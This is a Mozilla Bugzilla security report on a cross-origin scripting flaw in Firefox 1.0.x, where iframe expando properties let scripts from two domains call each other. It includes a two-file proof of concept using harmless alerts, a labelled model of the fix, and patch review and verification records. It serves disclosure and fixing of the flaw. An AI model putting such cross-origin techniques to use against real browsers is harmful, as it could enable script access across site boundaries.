Closed Bug 294978 Opened 20 years ago Closed 19 years ago

cross-origin scripting using iframes

Categories

(Core :: Security, defect)

defect
Not set
normal

Tracking


VERIFIED FIXED
mozilla1.8beta5

People

(Reporter: darin.moz, Assigned: jst)

References


Details

(Keywords: fixed1.8, verified1.7.13, Whiteboard: [sg:fix])

Attachments

(2 files)

It is possible in Firefox 1.0.x to assign attributes on window.frameElement from one domain and have them be callable from another domain. For example,

http://first.domain/outer.html :
------------------------------------------------------------------------------
<html>
<body>
<script>
function doOuter() {
  alert("Somebody just called the outer:\n" + window.location.href);
}
// Calls the expando that the cross-domain inner document attached to the <iframe>.
function callInner() {
  var iframe = document.getElementById("inner");
  iframe.doInner();
}
</script>
<iframe id="inner" name="inner" src="http://second.domain/inner.html"></iframe>
<br>
<script>
// Attach an expando (non-IDL) property to the <iframe> element owned by this document.
var iframe = document.getElementById("inner");
iframe.doOuter = doOuter;
</script>
<button onclick="callInner();">Call Inner</button>
</body>
</html>
------------------------------------------------------------------------------

http://second.domain/inner.html :
------------------------------------------------------------------------------
<html>
<body>
<script>
// window.frameElement is the <iframe> element in the outer (first.domain) document.
function callOuter() {
  window.frameElement.doInner = doInner;
  window.frameElement.doOuter();
}
function doInner() {
  alert("Somebody just called the inner:\n" + window.location.href);
}
window.frameElement.doInner = doInner;
</script>
<button onclick="callOuter();">Call Outer</button>
</body>
</html>
------------------------------------------------------------------------------

To replicate this testcase, you could for example put the file on an apache server and change second.domain to be the IP address of your server. Then visit outer.html using the hostname of your server.

I set this up here: http://friedfish.homeip.net/~darinf/fun/outer.html

Given that that machine is using dynamic DNS, there's no telling how long it will remain valid.

From the testcase, press the "call inner" or "call outer" buttons, and notice the result. This seems like a bug to me. It doesn't work in IE.

I don't know how critical this really is, but I'm filing it as Security-Sensitive just in case.
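The following is an added example, not code from this bug report or from Mozilla's patch (attachment 197094). It models in plain JavaScript the rule that patch is titled with: a security check on get/set of non-IDL (expando) properties of an [i]frame element, so that only script from the element's own origin can attach or call such properties. The Proxy, the IDL_PROPERTIES set, the origin strings and the SecurityError class are assumptions made for the model; Gecko's real check lives in the frame element's scriptable helper (nsHTMLFrameElementSH, mentioned in the comment below) and is not reproduced here. The model replays the reporter's outer.html / inner.html scenario and shows which steps the check stops.

```javascript
// Added example (not from the bug or from Mozilla's patch): a simplified model
// of a same-origin check on non-IDL properties of a frame element.
//
// Assumptions: IDL properties are a fixed, known set and keep their own
// per-property checks (not modelled); everything else on the element is an
// expando, reachable only by script running in the element's owner origin.
const IDL_PROPERTIES = new Set(["tagName", "id", "name", "src"]);

class SecurityError extends Error {}

// Returns the view of `element` that script at `accessorOrigin` would get.
// `elementOrigin` is the origin of the document that owns the <iframe>.
function guardedFrameElement(element, elementOrigin, accessorOrigin) {
  const sameOrigin = elementOrigin === accessorOrigin;
  const deny = (op, prop) => {
    throw new SecurityError(
      `${accessorOrigin} may not ${op} non-IDL property "${String(prop)}" ` +
      `on a frame element owned by ${elementOrigin}`);
  };
  return new Proxy(element, {
    get(target, prop, receiver) {
      if (!sameOrigin && !IDL_PROPERTIES.has(prop)) deny("get", prop);
      return Reflect.get(target, prop, receiver);
    },
    set(target, prop, value, receiver) {
      if (!sameOrigin && !IDL_PROPERTIES.has(prop)) deny("set", prop);
      return Reflect.set(target, prop, value, receiver);
    },
  });
}

// Replays the bug's testcase against the model. Origins and the element are
// constructed sample data.
function replayTestcase() {
  const OUTER = "http://first.domain";
  const INNER = "http://second.domain";
  const iframe = { tagName: "IFRAME", id: "inner", name: "inner",
                   src: "http://second.domain/inner.html" };
  const calls = [];

  // outer.html: same origin as the element, so attaching doOuter is allowed.
  const outerView = guardedFrameElement(iframe, OUTER, OUTER);
  outerView.doOuter = () => calls.push("doOuter called");

  // inner.html reaches the element through window.frameElement, cross-origin.
  const innerView = guardedFrameElement(iframe, OUTER, INNER);
  const result = { idlReadOk: innerView.src === iframe.src };
  try {
    innerView.doInner = () => calls.push("doInner called");
    result.setBlocked = false;
  } catch (e) {
    result.setBlocked = e instanceof SecurityError;
  }
  try {
    innerView.doOuter();
    result.callBlocked = false;
  } catch (e) {
    result.callBlocked = e instanceof SecurityError;
  }
  result.outerCalls = calls.length;          // doOuter never ran
  result.innerExpandoLeaked = "doInner" in iframe;  // nothing was attached
  return result;
}

console.log(replayTestcase());
```

With the check in place the inner document can still read the element's IDL properties, but both of its expando operations (attaching doInner, calling doOuter) raise a SecurityError, and the outer document's function is never invoked from the other origin.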
Flags: blocking1.8b4+
Flags: blocking1.7.10+
Flags: blocking-aviary1.0.6+
Whiteboard: [sg:fix]
Flags: blocking1.7.11+ → blocking1.7.12+
The nsHTMLFrameElementSH methods I added never got called, there's something about the flags I'm not understanding or setting correctly. Punting to Johnny if we need a fix while I'm out.
Assignee: dveditz → jst
dveditz, care to put up what you've got so far? Sounds like some flags are missing indeed, show me a patch and I'll investigate.
dveditz, can you give us some status here? If you've got something, get that into the bug ASAP. Thanks.
Comment on attachment 197094 [details] [diff] [review]
Do security check when accessing/setting non-IDL properties on [i]frame elements

Looks good to me. /be
Attachment #197094 - Flags: superreview?(brendan) → superreview+
Comment on attachment 197094 [details] [diff] [review]
Do security check when accessing/setting non-IDL properties on [i]frame elements

r=dveditz
Attachment #197094 - Flags: review?(dveditz) → review+
Attachment #197094 - Flags: approval1.8b5?
Fixed on the trunk.
Status: NEW → ASSIGNED
Target Milestone: --- → mozilla1.8beta5
Status: ASSIGNED → RESOLVED
Closed: 19 years ago
Resolution: --- → FIXED
Attachment #197094 - Flags: approval1.8b5? → approval1.8b5+
jst, is this ready to land on the branch yet? If so, can you get that in soon? Thanks.
Fixed on the branch.
Keywords: fixed1.8
Flags: testcase+
Comment on attachment 197094 [details] [diff] [review]
Do security check when accessing/setting non-IDL properties on [i]frame elements

a=dveditz for drivers for the aviary101/moz17 branch
Attachment #197094 - Flags: approval1.7.13+
Attachment #197094 - Flags: approval-aviary1.0.8+
Fixed on the 1.0.1 and 1.7 branches.
verified with:

Windows:
Moz - Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.13) Gecko/20060214
Fx - Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.13) Gecko/20060214 Firefox/1.0.8

Macintosh:
Moz - Mozilla/5.0 (Macintosh; U;PPC Mac OS X Mach-O; en-US; rv:1.7.13) Gecko/20060214 Firefox/1.0.8
Fx - Mozilla/5.0 (Macintosh; U;PPC Mac OS X Mach-O; en-US; rv:1.7.13) Gecko/20060214 Firefox/1.0.8

Linux:
Moz - Mozilla/5.0 (X11; U;Linux i686; en-US; rv:1.7.13) Gecko/20060214
Fx - Mozilla/5.0 (X11; U;Linux i686; en-US; rv:1.7.13) Gecko/20060214 Firefox/1.0.8
Status: RESOLVED → VERIFIED
Group: security
Flags: in-testsuite+ → in-testsuite?